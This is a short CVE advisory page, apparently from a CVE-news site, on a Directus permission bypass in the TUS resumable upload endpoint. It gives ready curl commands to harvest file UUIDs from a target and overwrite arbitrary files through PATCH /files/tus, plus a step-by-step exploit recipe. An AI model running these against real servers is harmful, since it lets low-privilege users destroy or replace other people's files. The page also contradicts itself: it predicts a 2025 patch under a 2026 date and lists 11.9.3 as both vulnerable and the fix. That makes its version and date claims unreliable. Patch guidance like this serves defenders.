Directus, TUS Resumable Upload Permission Bypass, CVE-2025-55746 (Critical)

Listen to this Post

The vulnerability resides in the TUS resumable upload endpoint (/files/tus). The TUS controller performs only collection-level authorization checks, verifying the user has some permission on directus_files, but never validates item-level access to the specific file being replaced. As a result, row-level permission rules (e.g., “users can only update their own files”) are completely bypassed via the TUS path while being correctly enforced on the standard REST upload path. An authenticated user with basic file upload permissions can overwrite any existing file by its UUID, regardless of row-level restrictions. The victim file’s original stored bytes are deleted and replaced with attacker-controlled content, and its database record is updated with the attacker’s filename, type, and size metadata. If admin-owned files (e.g., application assets, templates) are stored in directus_files, a low-privilege user could replace them with malicious content, leading to privilege escalation.

dailycve form:

Platform: Directus
Version: 10.8.0-11.9.3
Vulnerability: TUS Permission Bypass
Severity: Critical
Date: 2026-04-05

Prediction: Patch expected by 2025-08-20

Analytics under What Undercode Say:

Enumerate file UUIDs (e.g., from image URLs)
curl -s https://target.com/assets/.jpg | grep -oE '[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
Overwrite a file using the TUS endpoint (authenticated)
curl -X PATCH https://target.com/files/tus \
-H "Authorization: Bearer $TOKEN" \
-H "Upload-Offset: 0" \
-H "Upload-Length: $(stat -c%s evil.txt)" \
-H "Tus-Resumable: 1.0.0" \
-F "[email protected]" \
-F "uuid=927b3abf-fb4b-4c66-bdaa-eb7dc48a51cb"

Exploit:

  1. Obtain a valid file UUID (e.g., from public image URLs).
  2. Authenticate as a user with basic file upload permissions.
  3. Send a PATCH request to `/files/tus` with the target UUID and attacker-controlled file content.
  4. The TUS handler overwrites the file without checking row-level permissions.

Protection from this CVE:

  • Upgrade to Directus version 11.9.3 or later.
  • If upgrade is not possible, disable TUS uploads by setting `TUS_ENABLED=false` in the configuration.
  • Implement strict collection-level and item-level permission checks for all file operations.

Impact:

  • Arbitrary file overwrite, permanent data loss, metadata corruption, and privilege escalation (if admin-owned files are replaced).

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top